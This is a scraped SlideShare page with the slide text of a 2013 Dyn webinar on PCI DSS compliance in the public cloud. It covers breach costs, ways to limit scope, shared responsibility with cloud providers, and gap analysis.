A Look At PCI Compliance with Dyn's Chris Brenton and Cory von Wallenstein

685 views

Published on

Dyn's Cory von Wallenstein and Chris Brenton conducted a webinar on PCI compliance and how DNS fits in.

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
685
On SlideShare
0
From Embeds
0
Number of Embeds
47
Actions
Shares
0
Downloads
4
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

A Look At PCI Compliance with Dyn's Chris Brenton and Cory von Wallenstein

  1. 1. DNS Security: PCI In The Public Cloud November 20, 2013
  2. 2. Your Presenters Cory von Wallenstein Chief Technologist @cvwdyn Chris Brenton Director of Security @Chris_Brenton DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton
  3. 3. What We’ll Talk About •  PCI: The reality of non-compliance •  Can you be compliant in the public cloud? •  Analyzing scope •  Should you outsource? DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 3  
  4. 4. Payment Card Industry Data Security Standards What’s  at  stake?   Trust  &  confidence   of  customers   DNS Security: PCI In The Public Cloud @dyn @cvwdyn Fines  &  loss  of   Merchant  privileges   @chris_brenton 4  
  5. 5. h<p://usa.visa.com/download/merchants/cisp-­‐pcidss-­‐compliancestats.pdf   DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 5  
  6. 6. Cost of Breach May  2013  Study  by  Ponemon  InsKtute   •  277  orgs  in  nine  countries   •  $136  average  cost  per  record  breached   •  (Germany  $199,  USA  $188)   •  2,300  records  –  99,000  records   •  average  of  23,647  records  breached   DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 6  
  7. 7. Compliance & Data Breach Correlation April  2011  Study  by  Ponemon  InsKtute   •  Breach  in  past  24  months:   •  2009  -­‐>  79%,  2011  -­‐>  85%   •  12%  believed  PCI  DSS  compliance  reduced  loss   •  50%  unsure   •  64%  of  compliant  companies:  no  breach  in  24  mos.   •  38%  non-­‐compliant  could  say  the  same   DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 7  
  8. 8. Let’s Cut To The Chase Can PCI DSS compliance be achieved in public cloud? •  Yes and folks are doing it •  PCI Council released guidelines last year DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 8  
  9. 9. Let’s Cut To The Chase There are three paths before you: •  The easy way - Work with a PCI DSS certified CSP •  The hard way – Work with non-certified CSPs •  The other hard way – Do it all yourself DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 9  
  10. 10. Let’s Cut To The Chase All are possibilities: •  One leads to less gray hair •  We’ll discuss your options today DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 10  
  11. 11. Where To Start •  Limit scope as much as possible! DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 11  
  12. 12. Where To Start •  Limit scope as much as possible! •  The fewer components touched by CC#’s the better DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 12  
  13. 13. Where To Start •  PCI DSS is extremely broad o  o  o  o  o  o  Network security Host Security Policy security Process security Malware protection Access and identity management DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 13  
  14. 14. Where To Start •  PCI DSS is extremely broad o  o  o  o  o  o  Network security Host Security Policy security Process security Malware protection Access and identity management •  Reducing scope minimizes control pain points DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 14  
  15. 15. Ways to Limit Scope •  Understand the flow of CC#’s in your system o  Are there opportunities to minimize interaction? DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 15  
  16. 16. Ways to Limit Scope •  Understand the flow of CC#’s in your system o  Are there opportunities to minimize interaction? •  Segregate systems processing CC#’s as much as possible DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 16  
  17. 17. Ways to Limit Scope •  Understand the flow of CC#’s in your system o  Are there opportunities to minimize interaction? •  Segregate systems processing CC#’s as much as possible •  Can some or all of the process be outsourced? o  This is where CSPs can come in o  We’ll expand on this point in later slides DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 17  
  18. 18. Helpful PCI Cloud Guidance? PCI DSS = 75 pages of compliance goodness DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton
  19. 19. Helpful PCI Cloud Guidance? PCI Cloud SIG Guidance = 52 pages describing how to apply those 75 pages to… •  Public cloud •  Private cloud •  Hybrid cloud •  IaaS, PaaS,SaaS •  Nested providers •  Oh my… DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton
  20. 20. The Bottom Line •  PCI in public cloud is a shared responsibility model •  You can’t completely exempt yourself from accountability for PCI controls •  However, you can limit the scope of the number of controls you are responsible for DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 20  
  21. 21. Cloud Responsibility Delineation DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton
  22. 22. Study Figure 3 DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton
  23. 23. Zuora as an Example •  PCI Level 1 compliant DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 23  
  24. 24. Zuora as an Example •  PCI Level 1 compliant •  Z-Payment offering o  Redirect all payments via iframe o  All processing and storage takes place on their systems DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 24  
  25. 25. Zuora as an Example •  What does this do to scope? o  Can you validate that changes in the redirect code are detected? o  You may be eligible to complete SAQ A o  15 questions versus 300+ o  Responsible for far fewer controls DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 25  
  26. 26. Gab Analysis •  Get a copy of the CSP’s scope and responsibility documentation •  This will identify which controls they have accepted responsibility for •  What ever is left is up to you to maintain DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 26  
  27. 27. Scope & Responsibility Example - CSP DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton
  28. 28. Scope & Responsibility Example - Client DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton
  29. 29. A Basic Checklist •  Understand the flow of credit card info o  What processes/services handle it? o  What communications exchange it? o  What drives/partitions store it? DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 29  
  30. 30. A Basic Checklist •  Understand what SaaS services will have Admin control o  Can be in-scope if controlling servers handling credit card info DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 30  
  31. 31. A Basic Checklist •  Flow diagrams are your friend. Leverage them. DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 31  
  32. 32. A Basic Checklist •  Delineate portions that are internal vs. external DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 32  
  33. 33. A Basic Checklist •  For internal portions, you need to address all 12 PCI req. DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 33  
  34. 34. A Basic Checklist •  For external portions o  Understand the CSPs scope and responsibility documentation o  Fill in the gaps as required DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 34  
  35. 35. What if the CSP is not PCI compliant? •  This is where things get painful DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 35  
  36. 36. What if the CSP is not PCI compliant? •  This is where things get painful •  Your assessment will need to include the CSP’s controls DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 36  
  37. 37. What if the CSP is not PCI compliant? •  This is where things get painful •  Your assessment will need to include the CSP’s controls •  Extremely expensive and problematic DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 37  
  38. 38. What if the CSP is not PCI compliant? •  This is where things get painful •  Your assessment will need to include the CSP’s controls •  Extremely expensive and problematic •  Will require assurances the CSP will maintain compliance DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 38  
  39. 39. What if the CSP is not PCI compliant? •  This is where things get painful •  Your assessment will need to include the CSP’s controls •  Extremely expensive and problematic •  Will require assurances the CSP will maintain compliance •  Consider this your worst case option DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 39  
  40. 40. What if my CSP gets 0wn3d? •  Depends on whether the CSP is an approved service provider DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 40  
  41. 41. What if my CSP gets 0wn3d? •  Historically, merchants not liable when approved vendor messes up o  Heartland is a great example DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 41  
  42. 42. What if my CSP gets 0wn3d? •  If the CSP in not approved, you could still be on the hook. DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 42  
  43. 43. What if my CSP gets 0wn3d? •  Two examples: o  What if Zuora gets compromised? o  What if box.net gets compromised? DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 43  
  44. 44. Final Thoughts Can PCI DSS compliance be achieved in public cloud? •  Yes and folks are doing it DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 44  
  45. 45. Final Thoughts The easy way: •  Work with a PCI DSS certified CSP •  Perform a gap analysis against the CSPs “PCI scope and responsibility” documentation o  Their scope should include any nested providers •  Make sure you fill in all the gaps J DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 45  
  46. 46. Final Thoughts The hard way: •  Work with a CSP that has not achieved PCI compliance •  Your auditor must scope and review their environment •  You essentially must certify the CSP while footing the bill DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton 46  
  47. 47. Questions? Cory von Wallenstein Chief Technologist @cvwdyn Chris Brenton Director of Security @Chris_Brenton DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton

×